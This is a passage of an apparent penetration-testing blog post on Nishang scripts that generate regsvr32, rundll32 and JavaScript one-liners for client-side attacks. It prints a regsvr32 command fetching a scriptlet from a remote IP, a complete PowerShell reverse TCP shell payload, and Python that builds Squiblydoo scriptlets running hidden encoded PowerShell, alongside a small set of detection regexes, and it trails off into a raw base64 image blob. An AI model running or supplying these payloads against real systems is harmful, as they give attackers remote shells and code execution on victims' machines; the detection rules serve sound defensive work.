<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSHT2ghXZZLsZ7Ti9Wu11MVnTAY3oRp9lP4tkWAgEY8gkeDgGUtYsMiPbDyysBK91HQ2B0PrKnZEuJiUAfDJgCaPBNLMnulQRzCf7_6ow5wQEvRN_7d0Iwn4jlE9iF8rC7ORhQm9rtN50/s1600/regsvr_listener.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="47" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSHT2ghXZZLsZ7Ti9Wu11MVnTAY3oRp9lP4tkWAgEY8gkeDgGUtYsMiPbDyysBK91HQ2B0PrKnZEuJiUAfDJgCaPBNLMnulQRzCf7_6ow5wQEvRN_7d0Iwn4jlE9iF8rC7ORhQm9rtN50/s400/regsvr_listener.png" width="400" /></a></div>
The above listener provides the following command to be run on the target: </div>
<div style="text-align: justify;">
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: white; color: black;">regsvr32.exe /u /n /s /i:http://54.93.72.226:80/file.sct scrobj.dll
</textarea></pre>
</div>
<div style="text-align: justify;">
As soon as the command is executed on a target, using a client side attack, or any other method:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitK0-GuqxLA_e6sf7rmumcmZgkBGPE9i0JueMORHCW6EOz0UusBJhhEHl2rFgupd_KFZDJO8ZnCu-V5rMtcnsy9ZT1czpuXE5efXwXnwSI7cFFNUEB0O0qYUTCu3spoT4titVEnZLTSr8/s1600/regsvr_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitK0-GuqxLA_e6sf7rmumcmZgkBGPE9i0JueMORHCW6EOz0UusBJhhEHl2rFgupd_KFZDJO8ZnCu-V5rMtcnsy9ZT1czpuXE5efXwXnwSI7cFFNUEB0O0qYUTCu3spoT4titVEnZLTSr8/s400/regsvr_shell.png" width="400" /></a></div>
Great!<br />
<br /></div>
<div style="text-align: justify;">
This script also shows a window momentarily on the target machine, for the same reason as Invoke-JSRatRundll. </div>
<h3>
Out-RundllCommand</h3>
<div style="text-align: justify;">
Use this script to generate rundll32.exe one-line commands. The generated command can be used on a target to run PowerShell commands and scripts, or to get a reverse PowerShell session over TCP.<br />
<br />
Here is how to generate a command. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiypSTjF2jYHohjLnMgtfKIQDfdSVpHVlX_dxjtdsfCR5qkNEBXKbfg3V608NSyVGPL-VqK2SiDCe2GcKV1UtJuxXcOtECHF0MJ7Q6hX6VEBPFobDNiwrbDYfvWF9GRplJueUBQQeOCrnk/s1600/Out-Rundll_Payload.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="45" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiypSTjF2jYHohjLnMgtfKIQDfdSVpHVlX_dxjtdsfCR5qkNEBXKbfg3V608NSyVGPL-VqK2SiDCe2GcKV1UtJuxXcOtECHF0MJ7Q6hX6VEBPFobDNiwrbDYfvWF9GRplJueUBQQeOCrnk/s400/Out-Rundll_Payload.png" width="400" /></a></div>
Now, if the rundll32 command is executed on a target, using a client-side attack or another method, the payload gets executed.<br />
<br />
During testing it was not possible to execute larger scripts (especially encoded ones, because encoding increases their length). The added advantage of this script is that it can be used with a simple netcat listener on a Linux machine as well; there is no need to run a special listener, unlike the two scripts above.</div>
<div style="text-align: justify;">
Start a netcat/Powercat listener. Run Out-RundllCommand with the -Reverse switch: <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMdLiAR7lAL71-XJa16U8ON0n_9ifHAlUdnpfA8X_3NHwvBup7mf8yRl10OGk8dFhxjUNK5QjvNWlGGkpFwj2O9AWBblXHSmSt2zdur2jdS1V6XusRM4-GYMGvw0qX3H-x-w1dW_orNRI/s1600/Out-Rundll_reverse.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMdLiAR7lAL71-XJa16U8ON0n_9ifHAlUdnpfA8X_3NHwvBup7mf8yRl10OGk8dFhxjUNK5QjvNWlGGkpFwj2O9AWBblXHSmSt2zdur2jdS1V6XusRM4-GYMGvw0qX3H-x-w1dW_orNRI/s400/Out-Rundll_reverse.png" width="400" /></a></div>
When the generated rundll32 command is executed on the target:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZfdbAKe2UpJL40MjJUd-4afR90jhDBooCSqfYaHK-cUUXbRUY_gNH-jGtfTkUygjA1SOGtup6oA3RY6ZAldXuoRqKxLGplmGuLjvfeavOSDiXEif5dsocv11ODJq-ro211mmZDOKaO_E/s1600/rundll_reverse_netcat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZfdbAKe2UpJL40MjJUd-4afR90jhDBooCSqfYaHK-cUUXbRUY_gNH-jGtfTkUygjA1SOGtup6oA3RY6ZAldXuoRqKxLGplmGuLjvfeavOSDiXEif5dsocv11ODJq-ro211mmZDOKaO_E/s400/rundll_reverse_netcat.png" width="400" /></a></div>
<div style="text-align: justify;">
Nice!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Also, the execution is silent on the target machine. Please note that this script leaves rundll32.exe running on the target machine.</div>
<h3 style="text-align: justify;">
Out-JS</h3>
<div style="text-align: justify;">
This script is useful for client-side attacks. Using it, we can create "weaponized" JavaScript files which can be sent to a target user to execute PowerShell scripts and commands. Once the user executes the file (a double click opens it with Windows Script Host, wscript.exe), the specified payload is executed on the target with the privileges of the current user. The default name of the generated file is Style.js. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNVNTliI0nuhitac1dt7ycrddLvHdM4cGzxiYg3o8akIEt5Cz2aXLBx4CRCGxX6SArQI9391TP89i9Nw7OIIXNiZQJrkZy6BbLP1qKZ_8PbFnFH62mgOwtC8oLgTC8_XPTSTaRPUQJOYs/s1600/Out-JS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="23" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNVNTliI0nuhitac1dt7ycrddLvHdM4cGzxiYg3o8akIEt5Cz2aXLBx4CRCGxX6SArQI9391TP89i9Nw7OIIXNiZQJrkZy6BbLP1qKZ_8PbFnFH62mgOwtC8oLgTC8_XPTSTaRPUQJOYs/s400/Out-JS.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Once again, it was not possible to execute large scripts, therefore there is no option to specify a script path. An example is included in the script to get a reverse PowerShell session over TCP. </div>
<div style="text-align: justify;">
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: white; color: black;">Out-JS -Payload "`$sm=(New-Object Net.Sockets.TCPClient('192.168.230.154',443)).GetStream();[byte[]]`$bt=0..65535|%{0};while((`$i=`$sm.Read(`$bt, 0, `$bt.Length)) -ne 0){;`$d=(New-Object Text.ASCIIEncoding).GetString(`$bt,0, `$i);`$sb=(iex `$d 2>&1 | Out-String );`$sb2=`$sb + 'PS ' + (pwd).Path + '> ';`$sb=([text.encoding]::ASCII).GetBytes(`$sb2);`$sm.Write(`$sb,0,`$sb.Length);`$sm.Flush()}"
</textarea></pre>
</div>
<div style="text-align: justify;">
</div>
<h3 style="text-align: justify;">
Out-SCT</h3>
<div style="text-align: justify;">
This script generates an SCT file which can be used with regsvr32.exe to execute PowerShell scripts and commands. The default name of the generated file is UpdateCheck.xml. This file needs to be hosted on a web server, and the regsvr32 one-liner is then executed on the target. Note that, in case a PayloadURL is provided, two connections are made from the target environment: the first one to pull the SCT file and the second one to download the PowerShell script.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAmw6bxlqz3qwBC0geRdofJKts8tw_8QqttBIwZcyNzkvMSltPz1QLRZFl-zUhMbTyJWg2fItRyzIpqs8DDNxv86oMz5tfF3P8pSmRIbyQ0upiNKmJdZR67c3Jkzxj3sWbwyVKvTqfMFQ/s1600/Out-SCT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAmw6bxlqz3qwBC0geRdofJKts8tw_8QqttBIwZcyNzkvMSltPz1QLRZFl-zUhMbTyJWg2fItRyzIpqs8DDNxv86oMz5tfF3P8pSmRIbyQ0upiNKmJdZR67c3Jkzxj3sWbwyVKvTqfMFQ/s400/Out-SCT.png" width="400" /></a></div>
</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Like Out-JS, only small scripts can be executed using Out-SCT. An example is included in the help of this script which shows how to get a reverse PowerShell session over TCP without having to download a script. </div>
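To tie the regsvr32 half of this post together (Invoke-JSRatRegsvr above and Out-SCT here), the following Python is an added example and not the Nishang scripts themselves: it builds a scriptlet in the format regsvr32.exe and scrobj.dll expect, embeds a PowerShell command as an -EncodedCommand (my choice of wrapper, to avoid quoting fights inside JScript), produces the matching regsvr32 one-liner, and on the defensive side classifies process command lines for the two living-off-the-land patterns used throughout this post: regsvr32 with /i:http...scrobj.dll (Invoke-JSRatRegsvr, Out-SCT) and rundll32 with a javascript: argument (Invoke-JSRatRundll, Out-RundllCommand). The progid, classid, URL and command lines are constructed for the example.

```python
import base64
import re
import uuid
import xml.etree.ElementTree as ET


def encode_ps(command):
    """powershell.exe -EncodedCommand wants base64 over UTF-16LE, not UTF-8."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def build_sct(ps_command, progid="UpdateCheck", classid=None):
    """COM scriptlet in the Squiblydoo layout. The JScript under <registration>
    runs when scrobj.dll registers OR unregisters the scriptlet, which is why
    the one-liner can use /u and never write to the registry."""
    classid = classid or "{%s}" % str(uuid.uuid4()).upper()
    js = ('var sh = new ActiveXObject("WScript.Shell");'
          'sh.Run("powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden '
          '-EncodedCommand %s", 0, false);' % encode_ps(ps_command))
    return ('<?xml version="1.0"?>\n'
            '<scriptlet>\n'
            '<registration progid="%s" classid="%s">\n'
            '<script language="JScript"><![CDATA[\n%s\n]]></script>\n'
            '</registration>\n'
            '</scriptlet>\n' % (progid, classid, js))


def is_well_formed(sct):
    """scrobj.dll parses the scriptlet as XML; a malformed file fails silently."""
    try:
        return ET.fromstring(sct).tag == "scriptlet"
    except ET.ParseError:
        return False


def regsvr32_oneliner(url):
    # /u unregister, /n skip DllRegisterServer, /s silent, /i:<url> is handed
    # to DllInstall of scrobj.dll, which fetches and runs the scriptlet
    return "regsvr32.exe /u /n /s /i:%s scrobj.dll" % url


# Defender side: the same patterns seen from a process-creation log.
LOLBIN_RULES = [
    ("regsvr32-squiblydoo",
     re.compile(r'\bregsvr32(\.exe)?\b.*[/-]i:"?https?://.*\bscrobj\.dll\b', re.I)),
    ("rundll32-javascript",
     re.compile(r"\brundll32(\.exe)?\b.*javascript:", re.I)),
]


def classify_cmdline(cmdline):
    """Return the rule name for a suspicious command line, else None."""
    for name, rx in LOLBIN_RULES:
        if rx.search(cmdline):
            return name
    return None


if __name__ == "__main__":
    sct = build_sct("Get-Process")
    print(sct)
    print(regsvr32_oneliner("http://192.0.2.10/UpdateCheck.xml"))
    for line in (  # constructed command lines
        regsvr32_oneliner("http://192.0.2.10/UpdateCheck.xml"),
        r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();',
        r"regsvr32.exe /s C:\Windows\System32\msxml3.dll",
    ):
        print(classify_cmdline(line), "<-", line)
```

Host the output of build_sct() at the URL you pass to regsvr32_oneliner(); the classifier is the piece to lift into detection tooling, and both regexes are deliberately loose (either slash style for /i:, optional .exe, any whitespace) because the one-liners on this page are trivially rearranged.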
<div style="text-align: justify;">
<a href="data:image/png;base64,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